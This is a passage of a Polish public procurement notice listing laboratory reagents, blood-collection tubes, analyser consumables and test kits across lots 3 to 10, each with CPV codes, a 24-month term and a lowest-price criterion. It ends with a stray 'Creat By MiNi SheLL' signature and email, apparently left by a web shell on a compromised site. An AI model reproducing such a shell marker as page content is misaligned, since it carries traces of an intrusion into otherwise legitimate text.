1.Krwinki wzorcowe do wykrywania przeciwciał (3 x 4 ml) 3 - 4 %	24 op.
2.Krwinki wzorcowe do układu ABO (3 x 4 ml) 3 - 4 %	24 op.
3.Surowice anty RhD Standard (5 x 2 ml)	10 op.
4.Surowica antyglobulinowa (5 x 5 ml)	10 op.
5.Papaina (5 x 3ml)	10 op.
6.Odczynniki monoklonalne anty A I seria (5 x 5 ml)             	8 op.
7.Odczynnik monoklonalny anty A II seria (5 x 5 ml)             	8 op.
8.Odczynnik monoklonalny anty B I seria (5 x 5 ml)	8 op.
9.Odczynnik monoklonalny anty B II seria (5 x 5 ml)	8 op.
10.PBS (1 op. a 500 ml)	20 op.
11.Odczynnik LISS ( 1 op. a 100 ml)	15 op.
12.Odczynnik monoklonalny anty D BLEND (5 x 5 ml)	10 op.
13.Odczynnik monoklonalny anty RUM (5 x 5 ml)	10 op.
14.Krwinki do kontroli ujemnych PTA (2 x 2ml)	10 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Grupa 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa 4
1.Odczynnik do oznaczania czasu protrombinowego 1 op. - (12 x 4 ml)	30 op.
2.Odczynnik do oznaczania APTT 1 op. - (12 x 2 ml)	8 op.
3.Surowica kontrolna - zakres normalny 1 op. - (10 x 1 ml)	6 op.
4.Surowica kontrolna - zakres patologiczny 1 op. - (10 x 1 ml)	6 op.
5.Kuwety pomiarowe do K - 3002 Optic a 500 szt.	 25 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.70.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Grupa 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa 5
1.Pakiet do elektrolitów na aparat AVL 9140	24 op.
2.Płyn do czyszczenia aparatu a 125 ml	4 op.
3.Płyn do kondycjonowania aparatu a 125 ml	4 op.
4.Elektroda sodowa	3 szt.
5.Elektroda potasowa	3 szt.
6.Elektroda referencyjna	2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Grupa 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa 6
1.Test do wykrywania krwi utajonej w kale a 25 testów	8 op.
2.Test na lamblie met Eia ( 1 op. a 96)	5 op.
3.Test na Helicobacter Pylori ( 1 op. a 40)	6 op.
4.ASO latex + kontrole a 100	8 op.
5.Walera Rosego + kontrole a 100	6 op.
6.CPR + kontrole a 100 ozn a 100	10 op.
7.WR + kontrole a 100	4 op.
8.RF + kontrole a 100	6 op.
9.Troponina I a 20 testów	4 op.
10.Testy do wykrywania narkotyków w moczu ( 5 par)	4 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.70.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Grupa 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa 7
1.Probówki hematologiczne z EDTA a 2 ml (1 op. a 500 szt.)	40 op.
2.Probówki do 0B - 1 op. a 200 szt.	150 szt.
3.Szkiełka nakrywkowe (24 x 24) a 1000 szt.	40 op.
4.Szkiełka podstawowe a 50 szt.	40 op.
5.Probówki wirówkowe z korkiem dł. 65 mm, poj. 7 ml (1 op. a 200 szt.)	50 op.
6.Probówki chemiczne z granulatem a 11ml (1 op. a 200 szt.). Probówki muszą być do szybkiego wykrzepiania i wykonane z przezroczystego tworzywa).	100 op.
7.Probówki do koagulogii 0,2ml z 3,2% cytrynienem sodu a 1,8ml (1 op. a 500 szt.)	20 op.
8.Probówki poj. 4 ml, dł. 75 mm, O 12mm (a 500 szt)	10 op.
9.Probówki serologiczne, okręgłodenne, dł. 100 mm, O 12mm (a 500 szt.)	10 op.
10.Mazaki do pisania po szkle (niebieskie),  (1 op. a 12 szt.)	8 op.
11.Końcówki do pipet automatycznych niebieskie (a 1000 szt.)	20 op.
12.Końcówki do pipet automatycznych (żółte a 200 ml) po 1000 szt.	20 op.
13.Zlewka szklana (wysoka 1000 ml)	10 szt.
14.Płyty serologiczne (do ozn. grup krwi (7)) a 100 szt.)	8 op.
15.Mikrometoda a 200 ml do hemat. a 50 szt.	5 op.
16.Cylinder szklany na podstawce a 50 ml	10 szt.
17.Pipeta automatyczna a 5000 ml ustawna	1 szt.
18.Probówki Ependorfa a 500 ml a 1000 szt.	5 op.
19.Probówki do próżniowego pobierania krwi: hematologia a 100 szt.	10 op.
20.Probówki do próżniowego pobierania krwi: OB. a 100 szt.	10 op.
21.Probówki do próżniowego pobierania krwi: statyw do OB	5 szt.
22.Probówki do próżniowego pobierania krwi: koagulogia a 100 szt.	10 op.
23.Probówki do próżniowego pobierania krwi: biochemia a 100 szt.	20 op.
24.Zestaw (igła i strzykawka) do próżniowego pobierania krwi (1 op. a 100)	50 op.
25.Probówki okrągłodenne ze szkła O 18 mm dł 100 mm poj 12 ml (a 300 szt)	10 op.
26.Igła 8/10 a 100 szt.	10 op.
27.Igła 9/10 a 100 szt.	10 op.
28.Igła motylkowa z wężykiem a 50 szt.	4 op.
29.Uchwyt jednorazowego użytku a 10 szt.	10 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7, 33.19.25.00-7, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Grupa 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa 8
BIOCHEMIA (OZNACZENIA NA APARAT LUMEN)
1.Aspat-60 (5 x 48 + 1 x 60ml)	4 op.
2.ALAT - 60  (5 x 48 + 1 x 60ml)	4 op.
3.ALP 30 ( 1 x 30 ml + 5 x 24 ml)	2 op.
4.Amylase 30 (6 x 30 ml)	2 op.
5.Albumin 60 (6 x 30 ml + 1 x 2 ml)	2 op.
6.Bil - Total 60 (5 x 48 ml + 1 x 60 ml)	5 op.
7.Creatynine-60 (5 x 48 ml + 1 x 60 ml)	6 op.
8.Chol-60 (6 x 60 ml + 1 x 2 ml)	6 op.
9.Calcium-60 (6 x 60 ml + 1 x 60 ml + 1 x 2 ml)	3 op.
10.Ferrum-60 (5 x 48 ml + 1 x 60 ml)	4 op.
11.Glukose-120 (6 x 120 ml)	5 op.
12.Phosfor-30 (6 x 30 ml + 1 x 2 ml)	3 op.
13.Mg-30 (1 x 2 ml + 6 x 30 ml)	3 op.
14.Total - Protein 30 (6 x 30 ml + 1 x 2 ml)	3 op.
15.Urea-60 (5 x 48 ml + 1 x 60 ml)	5 op.
16.UA 60 (5 x 48 ml + 1 x 60 ml)	4 op.
17.HDL - Direct (4 x 30 ml + 4 x 10 ml)	5 op.
18.Surowica N ( 1 op. a 5 szt.)	6 op.
19.Surowica P ( 1 op. a 5 szt.)	6 op.
20.Multicalibrator (1 op. a 5 szt.) 	5 op.
21.Kuwety reakcyjne do aparatu Lumen	7 szt.
22.Naczynka pomiarowe do aparatu Lumen	7 op.
23.Wężyk do Lumena	3 szt.
24.Żarówka do Lumena	3 szt.
25.Igła do Lumena	1 szt.
26.Płyn myjący do aparatu Lumen (6 x 120 ml)	4 op.
27.Wzorzec do Fe	5 szt.
28.Wzorzec do kreatyniny	5 szt.
29.Wzorzec do kwasu moczowego	5 szt.
30.Wzorzec do glukozy	5 szt.
31.Isoton a 20 l Diluent do aparatu Mytic 18	4 op.
32.Lysing Reagent a 1 litr	4 op.
33.Cleaner a 1 litr	4 op.
34.Płyn myjący do Mytic 18	2 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.14.13.20-9, 38.43.70.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Grupa 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa 9
1.Odczynnik May - Grűnwalda 1 op a 1 l	10 op.
2.Odczynnik Giemsy 1 op. 1 l	10 op.
3.Płyn Lugola a 1 l	5 op.
4.Odczynnik Extona do oznaczania białka a 1 l	8 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.70.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Grupa 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa 10
1.Czytnik do moczu - podać nazwę handlową, model oraz producenta
z:	
2.Podajnik pasków w ruchu ciągłym 	
3.Paski do moczu min 10 parametrów + 1 pole do kwasu askorbinowego	
4.Pojemnik na zużyte paski w aparacie	
5.Zapewnienie od producenta pasków  kontroli jakości         
(Paski i aparat tego samego producenta)	
6.Paski do moczu (10 + 1 pole kwas askorbinowy)  - 600 op.
1 op. a 100 szt.	
7.Paski powinny posiadać certyfikat CE.	
8.Kontrole N - 8 op. - 1 op. a 5 szt.	
9.Kontrole P - 8 op. - 1 op. a 5 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.40.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com